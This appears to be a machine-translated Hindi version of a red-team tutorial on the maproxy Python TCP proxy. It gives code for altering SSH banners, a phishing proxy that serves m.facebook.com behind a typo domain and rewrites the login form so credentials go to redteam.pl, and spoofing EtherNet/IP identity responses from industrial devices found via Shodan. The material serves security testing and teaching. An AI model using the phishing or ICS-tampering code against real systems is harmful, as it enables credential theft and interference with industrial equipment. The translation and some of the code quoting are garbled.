तुरंत नेटवर्क डेटा संसाधित करें

पाठ्यक्रम की शुरुआत की पूर्व संध्या पर लेख का अनुवाद तैयार किया गया था “पेन्टेस्ट. प्रवेश परीक्षण अभ्यास".

अमूर्त

विभिन्न प्रकार के सुरक्षा मूल्यांकन, नियमित प्रवेश परीक्षण और रेड टीम संचालन से लेकर IoT/ICS उपकरणों और SCADA को हैक करने तक, बाइनरी नेटवर्क प्रोटोकॉल के साथ काम करना शामिल है, यानी क्लाइंट और लक्ष्य के बीच नेटवर्क डेटा को अनिवार्य रूप से इंटरसेप्ट करना और संशोधित करना। नेटवर्क ट्रैफ़िक को सूँघना कोई मुश्किल काम नहीं है क्योंकि हमारे पास वायरशार्क, टीसीपीडम्प या स्कैपी जैसे उपकरण हैं, लेकिन संशोधन अधिक श्रम-गहन कार्य लगता है क्योंकि हमें नेटवर्क डेटा को पढ़ने, फ़िल्टर करने, बदलने के लिए किसी प्रकार के इंटरफ़ेस की आवश्यकता होगी यह तुरंत चलता है और इसे लगभग वास्तविक समय में लक्ष्य होस्ट को वापस भेज देता है। इसके अलावा, यह आदर्श होगा यदि ऐसा उपकरण स्वचालित रूप से कई समानांतर कनेक्शनों के साथ काम कर सके और स्क्रिप्ट का उपयोग करके अनुकूलन योग्य हो।

एक दिन मुझे एक टूल मिला जिसका नाम है maproxy, दस्तावेज़ीकरण ने तुरंत मुझे यह स्पष्ट कर दिया maproxy - बस मैं यह चाहता हूं। यह काफी सरल, बहुमुखी और आसानी से कॉन्फ़िगर करने योग्य टीसीपी प्रॉक्सी है। मैंने इस टूल का परीक्षण कई जटिल अनुप्रयोगों पर किया, जिनमें आईसीएस डिवाइस (जो बहुत सारे पैकेट उत्पन्न करते हैं) शामिल हैं, यह देखने के लिए कि क्या यह कई समानांतर कनेक्शनों को संभाल सकता है, और टूल ने अच्छा प्रदर्शन किया।

यह आलेख आपको तुरंत नेटवर्क डेटा का उपयोग करके संसाधित करने से परिचित कराएगा maproxy.

Обзор

उपकरण maproxy टॉरनेडो पर आधारित है, जो पायथन में एक लोकप्रिय और परिपक्व एसिंक्रोनस नेटवर्किंग फ्रेमवर्क है।

सामान्य तौर पर, यह कई मोड में काम कर सकता है:

• TCP:TCP - अनएन्क्रिप्टेड टीसीपी कनेक्शन;
• TCP:SSL и SSL:TCP - एक तरफ़ा एन्क्रिप्शन के साथ;
• SSL:SSL - दोतरफा एन्क्रिप्शन।

यह एक पुस्तकालय के रूप में आता है. त्वरित शुरुआत के लिए, आप उदाहरण फ़ाइलों का उपयोग कर सकते हैं जो मुख्य को दर्शाती हैं पुस्तकालय कार्य:

• all.py
• certificate.pem
• logging_proxy.py
• privatekey.pem
• ssl2ssl.py
• ssl2tcp.py
• tcp2ssl.py
• tcp2tcp.py

केस 1 - सरल द्विदिश प्रॉक्सी

के आधार पर tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()

По умолчанию ProxyServer() दो तर्क लेता है - कनेक्शन स्थान और लक्ष्य पोर्ट। server.listen() एक तर्क लेता है - आने वाले कनेक्शन को सुनने के लिए पोर्ट।

स्क्रिप्ट निष्पादित करना:

# python tcp2tcp.py

परीक्षण चलाने के लिए, हम अपनी प्रॉक्सी स्क्रिप्ट के माध्यम से एक स्थानीय एसएसएच सर्वर से जुड़ने जा रहे हैं, जो सुनता है 2222/tcp पोर्ट और एक मानक पोर्ट से जुड़ता है 22/tcp एसएसएच सर्वर:

स्वागत बैनर आपको सूचित करता है कि हमारी उदाहरण स्क्रिप्ट ने नेटवर्क ट्रैफ़िक को सफलतापूर्वक प्रॉक्सी कर लिया है।

केस 2 - डेटा संशोधन

एक और डेमो स्क्रिप्ट logging_proxy.py नेटवर्क डेटा के साथ इंटरैक्ट करने के लिए आदर्श। फ़ाइल में टिप्पणियाँ उन क्लास विधियों का वर्णन करती हैं जिन्हें आप अपने लक्ष्य को प्राप्त करने के लिए संशोधित कर सकते हैं:

सबसे दिलचस्प बात यहाँ है:

• on_c2p_done_read - क्लाइंट से सर्वर तक के रास्ते में डेटा को इंटरसेप्ट करना;
• on_p2s_done_read - उलटा।

आइए SSH बैनर को बदलने का प्रयास करें जो सर्वर क्लाइंट को लौटाता है:

[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]

स्क्रिप्ट निष्पादित करें:

जैसा कि आप देख सकते हैं, क्लाइंट को गुमराह किया गया क्योंकि उसके लिए SSH सर्वर का नाम बदल दिया गया था «DumnySSH».

केस 3 - सरल फ़िशिंग वेब पेज

इस उपकरण का उपयोग करने के अनगिनत तरीके हैं। इस बार आइए रेड टीम संचालन की ओर से कुछ अधिक व्यावहारिक चीज़ों पर ध्यान केंद्रित करें। आइए लैंडिंग पृष्ठ का अनुकरण करें m.facebook.com और एक जानबूझकर टाइपो के साथ एक कस्टम डोमेन का उपयोग करें, उदाहरण के लिए, m.facebok.com. प्रदर्शन उद्देश्यों के लिए, आइए मान लें कि डोमेन हमारे द्वारा पंजीकृत है।

हम अपने पीड़ित प्रॉक्सी और एसएसएल स्ट्रीम के साथ फेसबुक सर्वर पर एक अनएन्क्रिप्टेड नेटवर्क कनेक्शन स्थापित करने जा रहे हैं (31.13.81.36). इस उदाहरण को काम में लाने के लिए, हमें HTTP होस्ट हेडर को बदलने और सही होस्टनाम को इंजेक्ट करने की आवश्यकता है, और हम प्रतिक्रिया संपीड़न को भी अक्षम कर देंगे ताकि हम सामग्री तक आसानी से पहुंच सकें। अंततः हम HTML फॉर्म को बदल देंगे ताकि लॉगिन क्रेडेंशियल फेसबुक के सर्वर के बजाय हमें भेजे जाएं:

[…]
def on_c2p_done_read(self,data):
 # replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response
     data = data.replace("action="/hi/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

एक परिणाम के रूप में:

जैसा कि आप देख सकते हैं, हम मूल साइट को सफलतापूर्वक बदलने में सफल रहे।

केस 4 - ईथरनेट/आईपी पोर्ट करना

मैं काफी समय से औद्योगिक उपकरणों और सॉफ्टवेयर (आईसीएस/एससीएडीए) के साथ काम कर रहा हूं, जैसे प्रोग्रामेबल कंट्रोलर (पीएलसी), आई/ओ मॉड्यूल, ड्राइव, रिले, लैडर प्रोग्रामिंग वातावरण और कई अन्य। यह मामला उन लोगों के लिए है जो औद्योगिक चीजें पसंद करते हैं। ऐसे समाधानों को हैक करने में नेटवर्क प्रोटोकॉल के साथ सक्रिय रूप से खेलना शामिल है। निम्नलिखित उदाहरण में, मैं दिखाना चाहूंगा कि आप ICS/SCADA नेटवर्क ट्रैफ़िक को कैसे संशोधित कर सकते हैं।

ऐसा करने के लिए, आपको निम्नलिखित की आवश्यकता है:

• नेटवर्क खोजी, उदाहरण के लिए, वायरशार्क;
• ईथरनेट/आईपी या सिर्फ एक एसआईपी डिवाइस, आप इसे शोडान सेवा का उपयोग करके पा सकते हैं;
• हमारी स्क्रिप्ट पर आधारित है maproxy.

सबसे पहले, आइए देखें कि सीआईपी (कॉमन इंडस्ट्रियल प्रोटोकॉल) से एक विशिष्ट पहचान प्रतिक्रिया कैसी दिखती है:

डिवाइस की पहचान ईथरनेट/आईपी प्रोटोकॉल का उपयोग करके पूरी की जाती है, जो औद्योगिक ईथरनेट प्रोटोकॉल का एक उन्नत संस्करण है जो सीआईपी जैसे नियंत्रण प्रोटोकॉल को लपेटता है। हम हाइलाइट किए गए आईडी नाम को बदलने जा रहे हैं जो स्क्रीनशॉट में दिखाई दे रहा है "ईथरनेट के लिए NI-IndComm" हमारी प्रॉक्सी स्क्रिप्ट का उपयोग करना। हम स्क्रिप्ट का पुन: उपयोग कर सकते हैं logging_proxy.py और इसी प्रकार क्लास विधि को संशोधित करें on_p2s_done_read, क्योंकि हम चाहते हैं कि क्लाइंट पर एक अलग पहचान वाला नाम दिखाई दे।

कोड:

[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response

 # Checking if we got List Identity message response
     if data[26:28] == b'x0cx00':
         print('Got response, replacing')
         data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
     super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

अनिवार्य रूप से, हमने दो बार डिवाइस पहचान के लिए कहा, दूसरी प्रतिक्रिया मूल थी, और पहली प्रतिक्रिया तुरंत संशोधित की गई थी।

और आखिरी

मेरी राय में maproxy एक सुविधाजनक और सरल उपकरण, जो पायथन में भी लिखा गया है, इसलिए मेरा मानना ​​है कि आप भी इसका उपयोग करके लाभ उठा सकते हैं। बेशक, नेटवर्क डेटा को संसाधित करने और संशोधित करने के लिए अधिक जटिल उपकरण हैं, लेकिन उन्हें भी अधिक ध्यान देने की आवश्यकता है और आमतौर पर एक विशिष्ट उपयोग के मामले के लिए बनाए जाते हैं, उदाहरण के लिए। मुरैना, मोदलिश्का या Evilginx तीसरे के समान मामलों के लिए, या canape आखिरी मामले के लिए. किसी न किसी तरह, मदद से maproxy आप नेटवर्क डेटा को इंटरसेप्ट करने के लिए अपने विचारों को तुरंत लागू कर सकते हैं, क्योंकि उदाहरण स्क्रिप्ट बहुत स्पष्ट हैं।

Windows AD में प्रमाणीकरण तंत्र का परीक्षण

स्रोत: www.habr.com